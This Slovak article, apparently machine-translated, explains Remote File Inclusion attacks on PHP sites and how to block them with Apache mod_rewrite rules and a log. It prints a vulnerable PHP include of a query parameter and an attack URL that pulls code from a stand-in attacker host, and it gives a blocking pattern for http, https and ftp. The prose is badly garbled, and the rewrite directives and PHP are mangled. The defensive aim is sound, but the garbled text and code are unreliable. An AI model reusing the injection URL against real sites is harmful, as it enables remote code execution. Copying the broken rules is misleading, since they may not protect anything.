Použitie mod_rewrite, aby sa zabránilo začlenenie vzdialených súborov

Jedným z najčastejších útokov utrpel webových stránok sa vykonáva cez pokus o hlavičkové súbory obsahujúce škodlivý kód, teoreticky hovorí o útoku je veľmi jednoduché hrať, robiť tak len preto, že súbor, ktorý obsahuje škodlivý kód a URL typu prehliadača.

Tento typ útoku, známy technický termín pre Remote File Zahrnutie alebo s jednoduchou skratkou pre RFI, je často spájaný s tzv režime vniknutiu XSA (Cross-Server Attack) sa zvyčajne vykonáva ohroziť bezpečnosť webových stránok Ak nie je webový server, čo je faktor, ktorý je ešte nebezpečnejší pre RFI.

Ak chcete spustiť útok RFI, útočník potrebuje "pamäť" v rámci aplikácie na to, aby jeho zaradenie na diaľku, tento "priestor" je všeobecne "diera" (chyba) zabezpečenia, ktorá z neho robí zraniteľným skript.
Klasický prípad úniku citlivých na RFI súvisí s bicyklom po stránkach názvy premenných, len jednoduchý kus kódu, ako to ohroziť aplikácie:

 



 # Include súborov cez QueryString premenné prešla







 patrí ($ _GET ['strana']);

 

V kóde máme nedefinovanej premennej, alebo skôr musí byť definované podľa parametrov posielal cez QueryString, napríklad, ak je priame URL na stránku obsahujúcu zoznam navrhovaných bude vyzerať takto:

 



 http://www.sito.com/index.php?pagina=news.php

 

hodnota premennej $ page sa rovná "Aktuality" útok na tejto žiadosti môže byť vykonané týmto spôsobom:

 



 http://www.sito.com/index.php?pagina=http://www.attacco.com/x.php

 

Súbor "x.php", v prípade úspešného útoku, by mohla obsahovať všetky typy škodlivého kódu a poškodiť omnoho významnejšie a definitívne než jednoduchosť útoku dá premýšľať.

Našťastie existuje niekoľko obranných techník, ktoré možno použiť, aby sa zabránilo takýmto útokom, počas tejto krátkej diskusii budeme analyzovať založený na URL rewrite modulu (mod_rewrite), poskytuje webový server Apache, ktoré môžu byť využité metódy iné.

Jeden z klasických poslať návod na webový server Apache je použitie klasickej. Htaccess, ktoré majú byť zahrnuté do zložky, ktorú chcete chrániť pred útokom.

Prvý spôsob, ktorý používame, je vložiť jednoduché pravidlo v súbore htaccess A.:

 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 ^(.+)$ RewriteRule - [F]

Pravidlo stanovuje, že formulovaný QueryString ("{QUERY_STRING}") nemôžu byť odovzdané argumenty obsahujúce slov "http", "https" a "ftp", bez ohľadu na to, čo je obsahom predchádzajúci alebo nasledujúci ("(.*)" ) parametrov. Ak sa tak stane webový server vráti chybu typu 403 (zakázané).

Tí, ktorí majú možnosť priameho prístupu ku konfiguračnom súbore Apache (httpd.conf), môže byť vložený v jednej nádobe s obsahom smernica môže mať vplyv porovnateľný s pravidlami stanovenými prededentemente:

 # Uistite sa, že mod_rewrite je k dispozícii







 <IfModule Mod_rewrite.c>







 # Aktivácia URL prepísať motor

 





 RewriteEngine on

 





 # My sme nastavili pravidlá proti RFI







 RewriteCond% {QUERY_STRING} (.*)( http | https | ftp): \ / \ /(.*)







 # Vyfiltrujte prípadné žiadosti o zaradenie a prirážky







 # Vraibile na životné prostredie [E = varname: hodnota]







 ^(.+)$ RewriteRule - [F, E = RFI: true]

 





 </ IfModule>

 





 # Creaimo záznam pokusov o RFI sme identficato







 # Skôr pomocou "premenné prostredia"







 CustomLog / názov_priečinka / rfi.log kombinácii env = RFI

Po napísaní tejto smernice do konfiguračného súboru, je nutné uložiť vykonané zmeny a reštartovať webový server, ktorý nadobudne účinnosť, na vedomie, že na konci zoznamu, a von z kontajnera bola vložená žiadosť o vytvorenie log súboru určená na žiadosti od vzdialených súborov začlenenia a monitorovanie tohto malého "Poznámky pre blokovanie útokov RFI," zistíme, že pokusy Remote File začleňovania na našich webových stránkach sú menej časté ako veril.